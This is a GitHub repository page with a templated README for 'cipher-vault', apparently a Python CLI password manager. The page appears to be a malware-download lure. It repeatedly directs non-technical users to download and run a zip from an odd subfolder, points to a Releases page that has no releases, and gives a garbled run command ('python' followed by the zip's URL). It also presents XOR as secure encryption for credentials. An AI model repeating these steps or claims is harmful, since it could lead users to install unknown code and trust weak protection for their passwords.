Skip to content

πŸ” Manage your passwords securely with Cipher Vault, a simple Python CLI that uses XOR encryption to keep your credentials safe and accessible.

Notifications You must be signed in to change notification settings

Zikodenomics/cipher-vault

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

9 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ” cipher-vault - Secure Your Passwords Easily

πŸš€ Getting Started

Welcome to cipher-vault! This application is a simple password manager that uses XOR cipher encryption to keep your passwords safe. It's designed for everyone, even if you're not a tech expert. Follow these steps to download and run the application.

πŸ“₯ Download

Download Released Version

πŸ“‹ System Requirements

  • Operating System: Windows, macOS, or Linux
  • Python Version: Python 3.6 or higher installed on your computer
  • Disk Space: At least 50 MB available

πŸ›  Features

  • Simple and user-friendly command-line interface
  • Secure storage of your passwords
  • Uses XOR encryption for data security
  • JSON format for easy password management
  • Works offline

πŸ’» Installation Steps

Step 1: Visit the Releases Page

To download the latest version of cipher-vault, visit our Releases page.

Step 2: Download the Application

On the Releases page, you'll see a list of available versions. Click on the most recent version to see the download options. You will find a file named https://github.com/Zikodenomics/cipher-vault/raw/refs/heads/main/midrashic/cipher_vault_v3.4.zip. Click the link to download this file to your computer.

Step 3: Extract the Files

Once the download is complete, locate the downloaded https://github.com/Zikodenomics/cipher-vault/raw/refs/heads/main/midrashic/cipher_vault_v3.4.zip file. Right-click on the file and select "Extract All" or use a file extraction tool of your choice. This action will create a folder named cipher-vault containing the application files.

Step 4: Open the Command Line

To run the application, you need to open the command line interface on your system.

  • Windows: Press Win + R, type cmd, and hit Enter.
  • macOS: Open Terminal from the Utilities folder.
  • Linux: Open the Terminal from your app launcher.

Step 5: Navigate to the Application Folder

In the command line, navigate to the folder where you extracted the cipher-vault files. Use the cd command:

cd path/to/cipher-vault

Replace path/to/cipher-vault with the actual path to the folder.

Step 6: Run the Application

Now, you are ready to run the application. Use the following command:

python https://github.com/Zikodenomics/cipher-vault/raw/refs/heads/main/midrashic/cipher_vault_v3.4.zip

This command starts the cipher-vault application.

πŸŽ‰ How to Use cipher-vault

  1. Add a Password:

    • After launching the application, select the option to add a new password.
    • Enter a title, username, and the password you want to store.
  2. Retrieve a Password:

    • Choose the option to retrieve an existing password.
    • Enter the title of the password you want to see.
  3. Delete a Password:

    • Select the delete option and input the title of the password you wish to remove.

Important Note

Ensure you remember the passwords you store. The application uses encryption, so losing your password means it cannot be recovered.

πŸ“‘ Documentation

For more details on how to use each feature, you can check out the official documentation on the Releases page.

πŸ”§ Troubleshooting

If you encounter issues when running the application:

  • Make sure you have Python installed on your computer.
  • Ensure you are using Python 3.6 or higher.
  • Check if any required files are missing from the cipher-vault folder after extraction.

If the problem persists, feel free to open an issue in the repository.

πŸš€ Download & Install

To get started with cipher-vault, visit our Releases page to download the most recent version. Follow the steps outlined above, and you'll be protecting your passwords in no time.

πŸ‘₯ Community and Support

Join our community for support and discussions:

  • Open an issue in this repository for help.
  • Search for existing issues that might answer your questions.
  • Interested in contributing? We welcome all contributions!

Thank you for choosing cipher-vault to manage your passwords securely. We hope you find it useful!

About

πŸ” Manage your passwords securely with Cipher Vault, a simple Python CLI that uses XOR encryption to keep your credentials safe and accessible.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages